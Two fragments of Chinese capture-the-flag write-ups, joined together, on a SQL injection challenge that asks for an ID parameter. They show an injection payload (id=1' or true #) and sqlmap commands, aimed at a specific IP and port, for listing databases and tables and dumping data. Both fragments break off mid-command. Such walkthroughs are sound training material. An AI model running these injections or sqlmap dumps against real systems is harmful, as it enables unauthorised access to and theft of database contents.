查看网页 很明显，他是要我们输入id 这里我尝试了直接爆破，没有成功 解法一（用万能密码）： payload如下： 我这里还尝试了id=1' or true # 没有成功，应该是题目把#给过滤了 解法二： 用sqlmap工具 用法： -D 选择数据库 -T 选择表 -C 选择列 --tables 列出所有表 --columns 列出所有列 --dump 打印出数

题目 访问题目路径  这个题目的意思就是请输入ID，然后尝试绕过，那应该就是SQL注入，但是呢，我是个懒狗，我直接跑sqlmap 先跑数据库名 sqlmap "http://61.147.171.105:51322/?id=1" --current-db 爆表 sqlmap "http://61.147.171.105:51322/?id=1" -D cyber --tab